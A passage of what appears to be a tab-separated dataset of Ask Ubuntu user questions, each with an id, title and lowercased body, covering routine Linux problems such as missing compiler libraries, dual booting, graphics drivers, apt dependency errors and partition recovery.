uuid=dbb033df-b455-41c5-a050-d6aa816462a1 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda2 during installation # uuid=0613-84b4 /boot/efi vfat defaults 0 1 # swap was on /dev/sda6 during installation uuid=8577fdea-9aef-4789-b62e-86100019d2e1 none swap sw 0 0 uuid=0613-84b4 /boot/efi vfat defaults 0 1 how can i get ubuntu to recognize my newly made 4tb raid 1 ?
346377	can not find -lgcc_s	i am attempting to compile a program with g77 and i keep getting the following error : /usr/bin/ld : can not find -lgcc_s collect2 : ld returned 1 exit status i saw on another forum that this is related to libgcc , when looking for libgcc i get > find /usr/ -name libgcc* /usr/share/doc/libgcc1 /usr/share/lintian/overrides/libgcc1 /usr/lib/libgccpp.so.1.0.3 /usr/lib/libgccpp.so.1 /usr/lib/gcc/x86_64-linux-gnu/4.6/libgcc_s.so /usr/lib/gcc/x86_64-linux-gnu/4.6/libgcc_eh.a /usr/lib/gcc/x86_64-linux-gnu/4.6/libgcc.a /usr/lib/gcc/x86_64-linux-gnu/3.4.6/libgcc_s_32.so /usr/lib/gcc/x86_64-linux-gnu/3.4.6/libgcc_s.so /usr/lib/gcc/x86_64-linux-gnu/3.4.6/libgcc_eh.a /usr/lib/gcc/x86_64-linux-gnu/3.4.6/32/libgcc_s_32.so /usr/lib/gcc/x86_64-linux-gnu/3.4.6/32/libgcc_s.so /usr/lib/gcc/x86_64-linux-gnu/3.4.6/32/libgcc_eh.a /usr/lib/gcc/x86_64-linux-gnu/3.4.6/32/libgcc.a /usr/lib/gcc/x86_64-linux-gnu/3.4.6/libgcc.a /usr/lib/ure/lib/libgcc3_uno.so
346378	how to install windows 7 on dell inspiron 15- 3521 laptop	i would like to know about how to install windows 7 on dell inspiron 15- 3521 laptop which has ubuntu by default , i want to know how to install windows 7 without deleting ubuntu .
346379	drm : i915_hangcheck_hung	my vaio se23fx has dual gpus . but i use the intel one . some times in a week or two my system hangs up in graphical mode . i then choose ctrl + atl + f1 to login in text mode and type the command dmesg . it result a message as following : drm : i195_hangcheck_hung hangcheck timer elapsed_gpu hung drm : capturing error event . look for more information in /debug/dri/0/i915_error_state my question is how to avoid it ? if i encounter with this issue how to avoid restarting my machine ?
346382	lenovo y510p and sli gt750m not working	i recently bought a lenovo y510p which comes with a sli of nvidia gt750m . i managed to install ubuntu 13.04 on my uefi system by simply downloading the correct .iso , disabling secure boot and removing my second graphics card from the ultrabay . so , ubuntu has installed itself with nouveau drivers , since it 's using the integrated intel hd4600 , which ca n't be disabled or enabled by the bios . since here , everything 's fine , i can boot into lightdm and work . now i want to use my full sli configuration , or at least i do n't want to physically remove my second graphics card from the laptop , so i installed the nvidia-current package from the repository . now the system freezes after this kernel message * starting lightdm display manager [ ok ] and i ca n't even switch to tty1 to 12 . i tried removing quiet splash from the boot entry , adding nomodeset=1 but nothing changed . is there any way to get it to work ?
346384	why nautilus consumes way too much memory ?	in the past 4/5 days i noticed something very strange . i am using ubuntu 13.04 amd64 . after some time from the system login i think an hour or two may be , either nautilus or python process uses too much memory about 2.5gb . normally i kill the process and memory get released , but within another hour or max . two repeats the same situation , and this goes forever . honestly as i have 8gb of memory i do not track always the usage , just when i notice from system load indicator that my computer uses a lot of memory , so i never observed if the memory usage by python or nautilus is incremental ( but i think it should be ) . nothing helped to make the problem disappear : reboot , shutdown or even x restart . but what is really strange is that this memory usage is alternating , ex : at first occurrence after system start i always have both processes - 2.5gb , python - 1.0 gb , after killing them have nautilus - 2.5 gb , after killing it i have python - 2.5gb , and the process repeats . so my question is how to find out the cause of this , how to debug such thing , or at least any suggestions .
346389	compiz makes dock , and panel disappear	i remember clicking something like `` disable unity desktop . '' as soon as i did that , the dock disappeared , and i can not access the top panel ( where i can click gear icon , volume , network , etc . ) i enabled `` wobbly desktops '' and then something else , and i accidentally clicked the wrong button `` disable unity desktop . my desktop is all blank , how can i get back the dock and such ?
346392	why can déjà dup not complete the backup of ./cache/dconf and .gvfs ?	i 'm 24hrs , or there about into using déjà dup . all seems well apart from this error message : backup finished could not back up the following files . please make sure you are able to open them . /home/mjwittering/.cache/dconf /home/mjwittering/.gvfs what should i do ? if anything ? many thanks in advance , matthew
346394	how to write a shscript to kill -9 a pid which is found via lsof -i	i 'm using tomcat , and sometimes when i tell it to stop it does n't properly kill the process . my way around this is too do : lsof -i tcp:8080 which outputs : command pid user fd type device size/off node name java 888 root 35u ipv6 780659 0t0 tcp * : http-alt ( listen ) java 888 root 39r ipv6 790103 0t0 tcp localhost:58916- > localhost : http-alt ( close_wait ) java 888 root 40r ipv6 792585 0t0 tcp localhost:58936- > localhost : http-alt ( close_wait ) java 888 root 75r ipv6 785553 0t0 tcp localhost:58701- > localhost : http-alt ( close_wait ) java 888 root 77r ipv6 787642 0t0 tcp localhost:58814- > localhost : http-alt ( close_wait ) java 888 root 130u ipv6 783894 0t0 tcp localhost:58686- > localhost : http-alt ( close_wait ) java 888 root 353u ipv6 780929 0t0 tcp localhost:58632- > localhost : http-alt ( close_wait ) i then run kill -9 pid i want a way to get all the pid numbers and kill them . thing is i do n't know how to isolate that field .
346395	how to check what suspends ? lubuntu saucy	i have a nokia booklet 3g and i have a problem ( not one , actually ) with poulsbo suspend/resume . i installed lubuntu saucy ( beta ) , which runs smoother than previous versions ( it actually boots , unlike lubuntus and ubuntus earlier than 12.10 ) . when everything in xfce4-power-manager is set to `` nothing '' ( closing the lid , low power , pressing buttons etc . ) and -- quirk-vbemode-restore is added to /etc/pm/cinfig.d/ ( as suggested here https : //wiki.ubuntu.com/hardwaresupportcomponentsvideocardspoulsbo ) computer suspends successfully , and shuts down after pressing power button . but when i change to anything other than `` none '' , system crashes on resume . what actually puts my system to sleep when power manager is set to `` do nothing '' ?
346396	ubuntu will not boot at all	i run ubuntu 12.04 . i downloaded and installed emulators for playstation , megadrive etc . i shut down my laptop as one does and the next day it would n't boot at all . first i tried booting it , and it just hanged at the black screen . i hold down shift to run gurb but it checks for errors , and then just hangs at black screen again . i put a usb into the laptop and can run ubuntu from the usb ( as a new install as it were - without actually installing it ) , however my hard drive exists under `` devices '' as `` 497 gb filesystem '' . recovery mode doesnt seem to be available to me at all . obviously i want to recover my files as i ca n't seem to boot my ubuntu properly . however , i lack the permissions to move the files from the `` device '' . i have tried to change the permissions , but i do not how to do so . if you can offer any help fixing the first issue ( to log in at al ) or the second ( how to recover my data otherwise ) i 'd greatly appreciate it . thanks !
346397	ghostscript renders image with black background	i 'm converting pdf files to images with ghostscript , everything is ok until i use -resize option , then i get image with black background . i use this command : convert -density 400 image.pdf -resize 25 % image.png i need to use -resize option otherwise i get really large image . is there any other option which i can use to resize image or is there option to set background in white .
346399	eth0 turns on with dhcp after reboot	i have supermicro sys-5015a-ehf-d525 with ipmi and am having a strange problem during reboot . i am running ubuntu 12.04.2 lts server . the `` primary '' network interface that is being used for activity is eth1 . it is set to a static address of 10.10.35.70 ( see code below ) . # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface # auto eth1 # iface eth1 inet dhcp auto eth1 iface eth1 inet static address 10.10.35.70 netmask 255.255.255.0 gateway 10.10.35.1 dns-nameservers 208.67.222.222 208.67.220.220 the ipmi interface shares eth0 . i thought it was disabled , but on reboot it acts as if it is setup for dhcp and grabs and ip address . the ipmi interface is setup to use 10.10.35.71 , but it not set in ubuntu . output of ifconfig after reboot : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:25:90 : c8:0b:98 inet addr:10.10.35.100 bcast:10.10.35.255 mask:255.255.255.0 inet6 addr : fe80 : :225:90ff : fec8 : b98/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1032849 errors:0 dropped:1 overruns:0 frame:0 tx packets:427403 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:194936769 ( 194.9 mb ) tx bytes:62104825 ( 62.1 mb ) interrupt:16 memory : fe9e0000-fea00000 eth1 link encap : ethernet hwaddr 00:25:90 : c8:0b:99 inet addr:10.10.35.70 bcast:10.10.35.255 mask:255.255.255.0 inet6 addr : fe80 : :225:90ff : fec8 : b99/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4089738 errors:0 dropped:1400 overruns:0 frame:0 tx packets:1561324 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3533629321 ( 3.5 gb ) tx bytes:149875516 ( 149.8 mb ) interrupt:17 memory : feae0000-feb00000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:7628905 errors:0 dropped:0 overruns:0 frame:0 tx packets:7628905 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1978672469 ( 1.9 gb ) tx bytes:1978672469 ( 1.9 gb ) when the system reboots the dual ip addresses causes problems for routing and connectivity in some cases . i can run sudo ifconfig eth0 down but would like to determine a way to prevent the eth0 from obtaining an ip address in the first place .
346400	how can i install unbuntu 13.04 inside ubuntu 12.04 ?	how do i go about installing ubuntu 13.04 inside ubuntu 12.04 lts ? i need the ls for stability ( work ) but want to experiment ; a little ?
346401	is there an application/way to fix or confine bad sectors with ubuntu ?	my hardisk has 1880 bad sectors and i am beginning to realize that it about to fail . is there a way using my ubuntu os to fix or at least partition off the part of my hd where most of these sectors are ?
346405	can i make a youtube series about programs on the ubuntu software center ?	i would like to make a video series of me touring the software center , browsing programs , and introducing others to the ubuntu software center and its programs . can i do this ? i am asking because i do not want to infringe on any copyright or something of that sort .
346409	is there a vi file editor in ubuntu like in unix ?	i was a unix and redhat user , just started to use ubuntu . is there a vi command to edit files ? is there a change mode command to change a file status to executable ?
346415	wireless passphrase	i installed a new wireless modem today . like expected , i had to enter the passphrase/password for me to access it from my windows computer . however , when i went to set up my wife 's system lubuntu 12.04 , it connected to the modem without incident ( i did n't have to enter a passphrase/password ) . the other modem was disconnected , and powered off , so that is n't an issue . i was able to browse the internet just fine on lubuntu . my isp 's tech support confirmed the modem was set up as a secure network . why did n't lununtu ask for the passphrase/password like it did with the old modem ? the ssids and passphrase/password are different .
346417	how to downgrade ubuntu 13.10 to 12.10 ?	i really want to upgrade but if i do i need to be able to downgrade . i also want to know the spec are right for my system info . system info memory 2.0 gib processor intel pentium ( r ) 4 cpu 2.80ghz x 2 graphics are gallium 0.4 on amd cedar os type 32 bit disk 90.1 gb
346418	stuck at splash screen	my laptop is lenovo g580 running on core i5 with geforce 630 m as discrete graphics , i have noticed that my graphics card is cosuming a lot of power and then turned it off using sudo gedit /etc/rc.local and then adding echo igd > /sys/kernel/debug/vgaswitcheroo/switch echo off > /sys/kernel/debug/vgaswitcheroo/switch before exit0 now a new problem has come up the splash screen gets stuck when i turned of quiet splash i noticed it was always fails at the task . starting reload cpus upon starting avahi daemon to make sure remote queues are populated and stops at starting network connnection manager sometimes it boots normal tough , how can i get rid of this problem ?
346419	how to make ubuntu realize application type ?	i made a text editor for ubuntu in java , and now i want to upload it on the ubuntu software center but i have ran into a problem , how will ubuntu recognize that my application is an editor once people download my application ? is there a way to register my app in ubuntu with java as an editor so when people try to open a text file , my application shows in the `` open with '' menu ? any help would be appreciated .
346420	system v init scripts	how do i list the services running on an instance started by system v init scripts ? i attempted to run 'service | -- status-all > ' with no luck .
346426	which version should i install ? 12.04 lts or 13.04 ?	i 'm just about to download and install ubuntu but i 'm confused by the descriptive paragraphs for these versions ; it says that the 12.04 lts version has support to 2017 but that the latest version 13.04 is only supported for several months ! ! ! ! which should i download ?
346428	ubuntu phone on huawei u9508	if this list not my device , what should i do ? is it possible to somehow add to this list my phone huawei u9508 . this phone is n't a very poor performance . https : //wiki.ubuntu.com/touch/devices i would like to differentiate amongst ubuntu on my phone
346440	monitor resolution	i have a monitor resolution of 1366 x 768 , but ubuntu 12.04 detects 1024 x 768 . do not give me the option of mirroring monitor . not offer another higher resolution . how i can solve the problem ? excuse my language mistakes , i speak spanish
346443	locking is not possible in the directory `` /opt/eclipse/configuration/org.eclipse.osgi ''	i installed eclipse 4.3 to my ubuntu 13.04 and it works perfect when i am root . however when i try to run eclipse without root authorization , i receive the following error message : locking is not possible in the directory `` /opt/eclipse/configuration/org.eclipse.osgi '' . a common reason is that the file system or runtime environment does not support file locking for that location . please choose a different location , or disable file locking passing `` -dosgi.locking=none '' as a vm argument . /opt/eclipse/configuration/org.eclipse.osgi/.manager/.filetablelock ( permission denied ) how can i fix this ?
346444	touchpad and usb ports works in live but not when the system is installed , why and how to fix it ?	i 'm really desperate . usually i can find solutions for my problems within a day or two . but this time its different . none of the tutorials i 've tried seem to work for me . when i boot my lenovo ideapad u510 from my ubuntu live usb stick everything is fine : wifi , touchpad and usb ports work properly . after the install my touchpad does not work , usb mouses and usb sticks are not recognized and i can not build up a wifi connection . why does the live system work but after the install everything fails ?
346445	is dual booting the answer , or separate os per device ?	i have a laptop i have been using for about 2 years now . works decent for gaming , but i am going to hopefully build a pc soon for much better gaming performance . for school , i am taking classes which involve programs like microsoft project . i have heard about linux/ubuntu for a while , but never really thought seriously about getting it . if i did get it now , what would be the best combination of which os should go on what device ? if i used ubuntu on either of them , how hard would dual booting be , so i could easily swap between them if needed ? i do n't really know much about how that works .
346447	dell inspiron e1705 wo n't shutdown after ubuntu 3.10 install	i recently installed ubuntu 3.10 for the second time , after trying to install nvidia drivers , that i found out later i really do n't need . i just installed google earth , and it said my drivers were n't good enough to display their graphics , but i know my hardware was good enough cause it worked when i had google earth on this machine when it was windowsxp . anyway ... i had gotten everything `` just right '' before this , including making native wireless work and all that.. interesting thing , if i `` restored '' to an earlier date with deja-dup everything went back to normal , but the second i shutdown , it went back to crap . so i opted to re-install ubuntu as i had only had it for a week or so and did n't really have anything important on it . now every time i start it it asks me if i want to run ubuntu or memory test etc ... instead of just starting like it used to . also whenever i hit shutdown , or shutdown now in terminal it just hangs..i have to hold down power button to turn it off . any ideas folks ? i really wan na stick with linux , i loved it before i attempted the useless nvidia install ... ps : i have never been able to `` login '' in the ctrl+alt+f1 screen ... and i ca n't log in as su in terminal , says i do n't have `` permissions '' . 0.o
346451	where can i find epson perfection v500 scanner drivers	epson discontinued support of linux drivers for the perfection v500 photo scanner at the end of 2012 . i have reviewed the older answers ( 2012 ) for this question and have the list of needed drivers for ubuntu 12.04 lts . my question , where can i find them now ?
346453	jabref and lyx : `` selective '' pushing	when trying to insert citations into lyx from a .bib file generated with jabref . only a subset of citation ( 5 ! out of 20 in jabref ) show up in the citation selection menu from lyx . using : lyx 2.0.2 jabref 2.7b ubuntu 12.04lts lyxpipe is set up in both programs under ~/.lyxpipe
346455	opening .asp files on ubuntu 13.04	i have to open an .asp file to print it . i have tried renaming it to .pdf but that did n't work . is there a work about on ubuntu 13.04 for opening these files ?
346459	broken packages in upgrade	i get this when trying to update ubuntu 12.04 nobook @ ubuntu : ~ $ apt-get dist-upgrade e : no se pudo abrir el fichero de bloqueo «/var/lib/dpkg/lock» - open ( 13 : permission denied ) e : no se encontró un archivo de réplica «/var/lib/dpkg/» nobook @ ubuntu : ~ $ sudo rm /var/cache/apt/archives/* [ sudo ] password for nobook : rm : can not remove `/var/cache/apt/archives/partial ' : is a directory nobook @ ubuntu : ~ $ sudo rm /var/cache/apt/archives/* rm : can not remove `/var/cache/apt/archives/partial ' : is a directory nobook @ ubuntu : ~ $ sudo apt-get purge openjdk* leyendo lista de paquetes ... hecho creando árbol de dependencias leyendo la información de estado ... hecho nota , seleccionando «openjdk-7-dbg» para la expresión regular «openjdk*» nota , seleccionando «openjdk7-jdk» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-doc» para la expresión regular «openjdk*» nota , seleccionando «openjdk-jre» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-demo» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-jdk» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-jre» para la expresión regular «openjdk*» nota , seleccionando «uwsgi-plugin-jvm-openjdk-6» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-source» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-jre-lib» para la expresión regular «openjdk*» nota , seleccionando «uwsgi-plugin-jwsgi-openjdk-6» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-jre-headless» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-jre-zero» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-source» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-demo» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-jre-zero» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-jre-lib» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-dbg» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-doc» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-jdk» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-jre» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-jre-headless» para la expresión regular «openjdk*» el paquete openjdk-6-dbg no está instalado , no se eliminará el paquete openjdk-6-demo no está instalado , no se eliminará el paquete openjdk-6-doc no está instalado , no se eliminará el paquete openjdk-6-jdk no está instalado , no se eliminará el paquete openjdk-6-source no está instalado , no se eliminará el paquete openjdk-6-jre-zero no está instalado , no se eliminará el paquete openjdk-7-dbg no está instalado , no se eliminará el paquete openjdk-7-demo no está instalado , no se eliminará el paquete openjdk-7-doc no está instalado , no se eliminará el paquete openjdk-7-jdk no está instalado , no se eliminará el paquete openjdk-7-jre no está instalado , no se eliminará el paquete openjdk-7-jre-headless no está instalado , no se eliminará el paquete openjdk-7-jre-lib no está instalado , no se eliminará el paquete openjdk-7-jre-zero no está instalado , no se eliminará el paquete openjdk-7-source no está instalado , no se eliminará el paquete uwsgi-plugin-jvm-openjdk-6 no está instalado , no se eliminará el paquete uwsgi-plugin-jwsgi-openjdk-6 no está instalado , no se eliminará tal vez quiera ejecutar «apt-get -f install» para corregirlo : los siguientes paquetes tienen dependencias incumplidas : default-jre : depende : openjdk-6-jre ( > = 6b23~pre11-1ubuntu1~ ) pero no va a instalarse default-jre-headless : depende : openjdk-6-jre-headless ( > = 6b23~pre11-1ubuntu1~ ) pero no va a instalarse icedtea-6-jre-cacao : depende : openjdk-6-jre-headless ( = 6b27-1.12.5-0ubuntu0.12.04.1 ) pero no va a instalarse icedtea-6-jre-jamvm : depende : openjdk-6-jre-headless ( = 6b27-1.12.5-0ubuntu0.12.04.1 ) pero no va a instalarse icedtea-netx : depende : openjdk-6-jre ( > = 6b23~pre10~ ) pero no va a instalarse o openjdk-7-jre pero no va a instalarse libdbus-1-3 : rompe : libdbus-1-3 : i386 ( ! = 1.4.18-1ubuntu1.3 ) pero 1.4.18-1ubuntu1.4 va a ser instalado libdbus-1-3 : i386 : rompe : libdbus-1-3 ( ! = 1.4.18-1ubuntu1.4 ) pero 1.4.18-1ubuntu1.3 va a ser instalado e : dependencias incumplidas . intente «apt-get -f install» sin paquetes ( o especifique una solución ) . nobook @ ubuntu : ~ $ apt-get -f install e : no se pudo abrir el fichero de bloqueo «/var/lib/dpkg/lock» - open ( 13 : permission denied ) e : no se encontró un archivo de réplica «/var/lib/dpkg/» nobook @ ubuntu : ~ $ apt-get install e : no se pudo abrir el fichero de bloqueo «/var/lib/dpkg/lock» - open ( 13 : permission denied ) e : no se encontró un archivo de réplica «/var/lib/dpkg/» nobook @ ubuntu : ~ $ sudo apt-get purge openjdk* leyendo lista de paquetes ... hecho creando árbol de dependencias leyendo la información de estado ... hecho nota , seleccionando «openjdk-7-dbg» para la expresión regular «openjdk*» nota , seleccionando «openjdk7-jdk» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-doc» para la expresión regular «openjdk*» nota , seleccionando «openjdk-jre» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-demo» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-jdk» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-jre» para la expresión regular «openjdk*» nota , seleccionando «uwsgi-plugin-jvm-openjdk-6» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-source» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-jre-lib» para la expresión regular «openjdk*» nota , seleccionando «uwsgi-plugin-jwsgi-openjdk-6» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-jre-headless» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-jre-zero» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-source» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-demo» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-jre-zero» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-jre-lib» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-dbg» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-doc» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-jdk» para la expresión regular «openjdk*» nota , seleccionando «openjdk-6-jre» para la expresión regular «openjdk*» nota , seleccionando «openjdk-7-jre-headless» para la expresión regular «openjdk*» el paquete openjdk-6-dbg no está instalado , no se eliminará el paquete openjdk-6-demo no está instalado , no se eliminará el paquete openjdk-6-doc no está instalado , no se eliminará el paquete openjdk-6-jdk no está instalado , no se eliminará el paquete openjdk-6-source no está instalado , no se eliminará el paquete openjdk-6-jre-zero no está instalado , no se eliminará el paquete openjdk-7-dbg no está instalado , no se eliminará el paquete openjdk-7-demo no está instalado , no se eliminará el paquete openjdk-7-doc no está instalado , no se eliminará el paquete openjdk-7-jdk no está instalado , no se eliminará el paquete openjdk-7-jre no está instalado , no se eliminará el paquete openjdk-7-jre-headless no está instalado , no se eliminará el paquete openjdk-7-jre-lib no está instalado , no se eliminará el paquete openjdk-7-jre-zero no está instalado , no se eliminará el paquete openjdk-7-source no está instalado , no se eliminará el paquete uwsgi-plugin-jvm-openjdk-6 no está instalado , no se eliminará el paquete uwsgi-plugin-jwsgi-openjdk-6 no está instalado , no se eliminará tal vez quiera ejecutar «apt-get -f install» para corregirlo : los siguientes paquetes tienen dependencias incumplidas : default-jre : depende : openjdk-6-jre ( > = 6b23~pre11-1ubuntu1~ ) pero no va a instalarse default-jre-headless : depende : openjdk-6-jre-headless ( > = 6b23~pre11-1ubuntu1~ ) pero no va a instalarse icedtea-6-jre-cacao : depende : openjdk-6-jre-headless ( = 6b27-1.12.5-0ubuntu0.12.04.1 ) pero no va a instalarse icedtea-6-jre-jamvm : depende : openjdk-6-jre-headless ( = 6b27-1.12.5-0ubuntu0.12.04.1 ) pero no va a instalarse icedtea-netx : depende : openjdk-6-jre ( > = 6b23~pre10~ ) pero no va a instalarse o openjdk-7-jre pero no va a instalarse libdbus-1-3 : rompe : libdbus-1-3 : i386 ( ! = 1.4.18-1ubuntu1.3 ) pero 1.4.18-1ubuntu1.4 va a ser instalado libdbus-1-3 : i386 : rompe : libdbus-1-3 ( ! = 1.4.18-1ubuntu1.4 ) pero 1.4.18-1ubuntu1.3 va a ser instalado e : dependencias incumplidas . intente «apt-get -f install» sin paquetes ( o especifique una solución ) . nobook @ ubuntu : ~ $ any help ?
346461	unable to detect wireless with ubuntu 12.04	ubuntu 12.04 does n't detect any kind of wireless connection . however , when i plug in an ethernet cable , it works perfectly . windows 8 , which is installed in dual boot with ubuntu , connects with the wireless network perfectly . i know this problem is pretty common , but i 'm posting this here because i 've read dozens of solutions but noting has worked so far . i downloaded synaptics , ndiswrapper . i entered many commands in the terminal , but nothing seems to fix the problem . i think it 's important to point out that i know absolutely nothing about the command line . all i know is to press ctrl+alt+t , and paste a command / : if you 'd like me to show here how my notebook responds to a given command let me know . i know there are commands that reveal details about your drivers , etc. , but i 've read so many tutorials about how to setup a wireless connection that i ca n't remember any right now . and sorry for my english , it 's not my native language .
346463	how to hide grub2 menu ?	i need some help , i screwed up while trying to auto-mount on boot my usb external hdd , something went wrong and it does n't boot to ubuntu . i installed this https : //help.ubuntu.com/community/boot-repair and i ran it to repair the boot , and now i have a boot menu . the menu shows down booting and i do n't need it so how do i remove it ?
346470	i followed instructions to install spotify on ubuntu 13.04 and nothing happened	i ran the following sudo add-apt-repository `` deb http : //repository.spotify.com stable non-free '' sudo apt-get update sudo apt-get install spotify-client-qt there was no feedback of any kind . just the cursor returned . when i go to look for the application it is not there . since other users report success i am hoping there is something elementary that i am missing .
346471	l2tp tunnelling for static ip - ubuntu 12.04 as router	got an ubuntu desktop set up as my router , isp recently added static ips and i 've got no idea how to get this to work . any help would be appreciated . connection type remote access type dial out sever ip 196.30.121.50 username your dsl username password your dsl password authentication type pap tunnel authentication yes secret h3lp active as default route yes ipsec no
346480	installing graphics drivers on dell xps 17	can anyone give me specific information on what am i supposed to do to install the graphics cards drivers on my laptop ? i have a dell xps 17 which comes with intel hd graphics as integrated card and nvidia gt 525m as dedicated card . ubuntu only recognizes intel 's , and recognizes it as intel sandybridge mobile , even after installing mesa-utils . i tried everything i could in the past : tried installing bumblebee , nvidia-current , and even tried downloading the graphics card drivers directly from nvidia 's website . it just wo n't work ; i end up corrupting it , and ca n't revert the changes . the screen gets stuck in a resolution smaller than my laptop 's default one ( which is full hd ) , not to count the times when unity just wo n't open . this made me format my laptop about four times , and i do n't want to mess up again this time . i 'd be glad if anyone could give me proper directions or show me what i 'm doing wrong .
346485	does swap space use real ram to keep it on ?	i would like to know if having swap space , uses ram/memory to keep the swap space 'active ' , even though the swap space is virtual ram .
346491	ubuntu partition on windows 8 machine	i have an asus q400a , running windows 8 , and would like to add an ubuntu 12.04 partition to the hard drive . however , each time that i select the `` install ubuntu '' option from the boot menu , the screen goes blank , and the computer idles until i shut it down . i have burned two different dvds from two different downloads , and finally tried to boot from a usb drive . i have shrunken the windows partition to make space ( yes i know ubuntu usually gives you the option to do this during installation ) , as well as changed the boot command by replacing 'quiet splash ' with 'nomodeset ' , in hopes that the problem was with the graphics drivers , but neither of these changes fixed the problem . i am out of ideas , please help .
346493	can you mount new partition to /var/log without rebooting	i have made a new partition that i have for the /var/logs . i have edited the fstab . is it possible to mount this over the /var/log without rebooting the server ?
346498	ubuntu 12.04 can not adjust brightness on dell inspiron 15 : the suggested solution to change the grub fails	dell inspiron 15 ( inspiron 3521 ) . the graphic card is the integrated intel graphic card : intel速 hd graphics screen is : led backlit display with truelife and hd resolution install ubuntu 12.04 downloaded in sep. 2013 . if i use the function key fn+f4/f5 , it shows the brightness bar . but there is not effect . the brightness stays the same . i googled . one suggested solution to use grub : acpi_osi=linux or acpi_backlight=vendor , you know there are many variants . then i restarted my laptop : after the menu , it is stuck there . then i can only force to turn off the laptop , and restart to choose the recover mode . ubuntu will start . brightness still can not change . i change the grub setting back . now the laptop can start correctly . of course , brightness adjustment does not work . the second suggested solution is to install xbacklight . it can not work . i used xrandr -q | grep `` connected '' xrandr -- output lvds1 -- brightness 0.8 it seems to work . but i think it adjusts not brightness , but contrast . so actually it looks not good . then what should i do ? now i do not want to use the newly bought dell laptop any more . or i switch to window ? oh , i like ubuntu !
346504	what should i do after cmake occureed ?	i want to install a softerware with sources after git cloned . the author said the following steps to install it : git submodule init git submodule update mkdir build ; cd build cmake .. make sudo make install but when i go into the step cmake .. , the error occureed : -- checking for module 'purple' -- package 'purple ' not found cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:279 ( message ) : a required package was not found call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpkgconfig.cmake:333 ( _pkg_check_modules_internal ) cmakelists.txt:18 ( pkg_check_modules ) -- checking for module 'glib-2.0' -- package 'glib-2.0 ' not found cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:279 ( message ) : a required package was not found call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpkgconfig.cmake:333 ( _pkg_check_modules_internal ) cmakelists.txt:19 ( pkg_check_modules ) -- checking for module 'mozjs185' -- package 'mozjs185 ' not found cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:279 ( message ) : a required package was not found call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpkgconfig.cmake:333 ( _pkg_check_modules_internal ) cmakelists.txt:20 ( pkg_check_modules ) libpurple version : package purple was not found in the pkg-config search path . perhaps you should add the directory containing `purple.pc' to the pkg_config_path environment variable no package 'purple ' found libpurple version outdate -- checking for module 'libcurl' -- package 'libcurl ' not found cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:279 ( message ) : a required package was not found call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpkgconfig.cmake:333 ( _pkg_check_modules_internal ) liblwqq/cmakelists.txt:29 ( pkg_check_modules ) -- checking for module 'sqlite3' -- package 'sqlite3 ' not found cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:279 ( message ) : a required package was not found call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpkgconfig.cmake:333 ( _pkg_check_modules_internal ) liblwqq/cmakelists.txt:30 ( pkg_check_modules ) cmake error at src/cmakelists.txt:38 ( install ) : install targets given no library destination for module target `` webqq '' . =============================================== -- with libev ( option ) : no -- native language support : true -- install path : =============================================== -- configuring incomplete , errors occurred ! and when i installed the glib-2.0 and sqlite3 , the error message does n't change ! what 's more , the command sudo apt-get install purple does n't work . so , what should i do can i finish install this software ?
346510	recovering a deleted partition after installing ubuntu ?	i have a serious problem . i installed ubuntu 13.04 on my laptop . i format all partitions ( windows ) / ( erase all data and install ubuntu ) : ( . how do i recover my accidentally lost windows partitions after installing ubuntu ? . i try using partitionwizard and testdisk . but can not recovery partition , partitionwozard and testdisk only detected the linux partition ( linux/ext4 and linux/swap ) . i hope the answer . please help . and sorry for my english is not good . thanks : )
